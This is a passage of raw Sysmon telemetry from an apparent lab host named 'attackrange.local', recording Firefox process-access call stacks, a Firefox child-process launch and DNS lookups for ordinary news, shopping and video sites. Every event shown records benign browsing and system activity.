Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.210{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000018837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla Firefox\xul.dll+2bd4b22|C:\Program Files\Mozilla Firefox\xul.dll+2ba9421|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000018836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+2ba9393|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla 
Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.203{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.52.1142864272\473900103" -childID 7 -isForBrowser -prefsHandle 8580 -prefMapHandle 948 -prefsLen 15932 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 
"\\.\pipe\gecko-crash-server-pipe.7052" 3208 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000018827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.198{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-958B-6005-6405-00000000A301}6520C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.179{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bd18cd|C:\Program Files\Mozilla Firefox\xul.dll+2ba6aa4|C:\Program Files\Mozilla Firefox\xul.dll+2ba89c6|C:\Program Files\Mozilla Firefox\xul.dll+2bababe|C:\Program Files\Mozilla Firefox\xul.dll+1977d70|C:\Program Files\Mozilla Firefox\xul.dll+19710a8|C:\Program Files\Mozilla Firefox\xul.dll+4c9cc0|C:\Program Files\Mozilla Firefox\xul.dll+4c98d3|C:\Program Files\Mozilla Firefox\xul.dll+3167885|C:\Program Files\Mozilla 
Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+2ca8e5|C:\Program Files\Mozilla Firefox\xul.dll+2cb9e5|C:\Program Files\Mozilla Firefox\xul.dll+19775e8|C:\Program Files\Mozilla Firefox\xul.dll+4c3e85|C:\Program Files\Mozilla Firefox\xul.dll+276006|C:\Program Files\Mozilla Firefox\xul.dll+a1b031|C:\Program Files\Mozilla Firefox\xul.dll+275d7f|C:\Program Files\Mozilla Firefox\xul.dll+275993|C:\Program Files\Mozilla Firefox\xul.dll+4c069a 22542200x800000000000000018866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.134{59A5CD1D-945A-6005-3305-00000000A301}7052mediadb.kicker.de0type: 5 d1kt87jk3ydi5s.cloudfront.net;::ffff:143.204.215.65;::ffff:143.204.215.70;::ffff:143.204.215.89;::ffff:143.204.215.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.065{59A5CD1D-8E56-6005-2E00-00000000A301}246465.215.204.143.in-addr.arpa.0type: 12 server-143-204-215-65.fra53.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.138{59A5CD1D-945A-6005-3305-00000000A301}7052d1kt87jk3ydi5s.cloudfront.net02600:9000:2156:3400:f:18fa:cc00:93a1;2600:9000:2156:4800:f:18fa:cc00:93a1;2600:9000:2156:4e00:f:18fa:cc00:93a1;2600:9000:2156:7a00:f:18fa:cc00:93a1;2600:9000:2156:8200:f:18fa:cc00:93a1;2600:9000:2156:8400:f:18fa:cc00:93a1;2600:9000:2156:9c00:f:18fa:cc00:93a1;2600:9000:2156:aa00:f:18fa:cc00:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:59.135{59A5CD1D-945A-6005-3305-00000000A301}7052d1kt87jk3ydi5s.cloudfront.net0143.204.215.70;143.204.215.89;143.204.215.19;143.204.215.65;C:\Program Files\Mozilla Firefox\firefox.exe 
22542200x800000000000000018879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.142{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net02600:9000:214f:7000:16:7865:b7c0:93a1;2600:9000:214f:ba00:16:7865:b7c0:93a1;2600:9000:214f:ca00:16:7865:b7c0:93a1;2600:9000:214f:fa00:16:7865:b7c0:93a1;2600:9000:214f:1200:16:7865:b7c0:93a1;2600:9000:214f:3a00:16:7865:b7c0:93a1;2600:9000:214f:3c00:16:7865:b7c0:93a1;2600:9000:214f:3e00:16:7865:b7c0:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.123{59A5CD1D-945A-6005-3305-00000000A301}7052dkmnl856gd5un.cloudfront.net013.224.194.35;13.224.194.98;13.224.194.7;13.224.194.27;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.123{59A5CD1D-945A-6005-3305-00000000A301}7052www.kicker.de0type: 5 dkmnl856gd5un.cloudfront.net;::ffff:13.224.194.27;::ffff:13.224.194.35;::ffff:13.224.194.98;::ffff:13.224.194.7;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052djvbdz1obemzo.cloudfront.net0143.204.205.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:143.204.205.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org.cdn.cloudflare.net0104.18.165.34;104.18.164.34;C:\Program Files\Mozilla 
Firefox\firefox.exe 22542200x800000000000000018873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.100{59A5CD1D-945A-6005-3305-00000000A301}7052www.mozilla.org0type: 5 www.mozilla.org.cdn.cloudflare.net;::ffff:104.18.164.34;::ffff:104.18.165.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.097{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com02a00:1450:4001:819::200e;2a00:1450:4001:820::200e;2a00:1450:4001:821::200e;2a00:1450:4001:817::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.095{59A5CD1D-945A-6005-3305-00000000A301}7052youtube-ui.l.google.com0172.217.16.206;172.217.18.110;172.217.18.174;172.217.21.206;172.217.22.14;172.217.22.110;172.217.23.110;172.217.23.142;172.217.23.174;216.58.205.238;216.58.206.14;216.58.212.142;216.58.212.174;142.250.74.206;172.217.16.142;172.217.16.174;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.095{59A5CD1D-945A-6005-3305-00000000A301}7052www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:172.217.16.174;::ffff:172.217.16.206;::ffff:172.217.18.110;::ffff:172.217.18.174;::ffff:172.217.21.206;::ffff:172.217.22.14;::ffff:172.217.22.110;::ffff:172.217.23.110;::ffff:172.217.23.142;::ffff:172.217.23.174;::ffff:216.58.205.238;::ffff:216.58.206.14;::ffff:216.58.212.142;::ffff:216.58.212.174;::ffff:142.250.74.206;::ffff:172.217.16.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:03.128{59A5CD1D-8E56-6005-2E00-00000000A301}2464183.210.65.128.in-addr.arpa.9003-C:\Windows\sysmon64.exe 
22542200x800000000000000018880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:01.838{59A5CD1D-945A-6005-3305-00000000A301}7052www.spiegel.de0type: 5 aacfb9d106f4.link11.de;::ffff:128.65.210.183;::ffff:128.65.210.184;::ffff:128.65.210.185;::ffff:128.65.210.180;::ffff:128.65.210.181;::ffff:128.65.210.182;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:04.502{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.a.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:04.500{59A5CD1D-945A-6005-3305-00000000A301}7052e11847.a.akamaiedge.net0104.75.89.144;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:04.500{59A5CD1D-945A-6005-3305-00000000A301}7052ir.ebaystatic.com0type: 5 ir.ebaycdn.net;type: 5 ipv4.slot11847.ebay.com.edgekey.net;type: 5 e11847.a.akamaiedge.net;::ffff:104.75.89.144;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:06.213{59A5CD1D-8E56-6005-2E00-00000000A301}2464144.89.75.104.in-addr.arpa.0type: 12 a104-75-89-144.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000018885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:07.225{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945E-6005-3705-00000000A301}6636C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla 
Firefox\xul.dll+ffe277|C:\Program Files\Mozilla Firefox\xul.dll+f7ce83|C:\Program Files\Mozilla Firefox\xul.dll+f74158|C:\Program Files\Mozilla Firefox\xul.dll+319862|C:\Program Files\Mozilla Firefox\xul.dll+10d2f04|C:\Program Files\Mozilla Firefox\xul.dll+ed5c9f|C:\Program Files\Mozilla Firefox\xul.dll+b30306|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla 